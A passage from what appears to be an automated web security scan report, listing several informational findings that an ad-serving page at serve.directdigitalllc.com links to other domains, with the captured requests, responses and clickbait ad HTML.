Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:57:08 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=85%2C76%2C75&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=85%2C76%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=85%2C76%2C75&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.63. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string (the request below), and the response contains links to other domains (the cross-domain href and img src URLs in the response excerpt below).

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:36:31 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C76&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/rvnvca6zq5.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11">Do You Miss Being Happy?</a></span>
<a onclick="javascript:trackClick(76, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=75%2C85%2C76&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...

19.64. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string (the request below), and the response contains links to other domains (the cross-domain href and img src URLs in the response excerpt below).

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:15:58 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C125%2C85&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C125%2C85&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C125%2C85&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...

19.65. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The page was loaded from a URL containing a query string (the request below), and the response contains links to other domains (the cross-domain href and img src URLs in the response excerpt below).

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:21:08 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/j0c08ui84r.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11">1 Easy Way To Feel Happy</a></span>
<a onclick="javascript:trackClick(75, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=75&b=26&p=75%2C85%2C125&t=11">Boston researchers have discovered the secret to happier living. <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/eghxushmko.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11">1 Trick to Relieve Joints</a></span>
<a onclick="javascript:trackClick(85, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=85&b=26&p=75%2C85%2C125&t=11">See how you can relieve your joints with this fast and easy trick... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/kdcnz258in.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=75%2C85%2C125&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...

19.66. http://serve.directdigitalllc.com/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

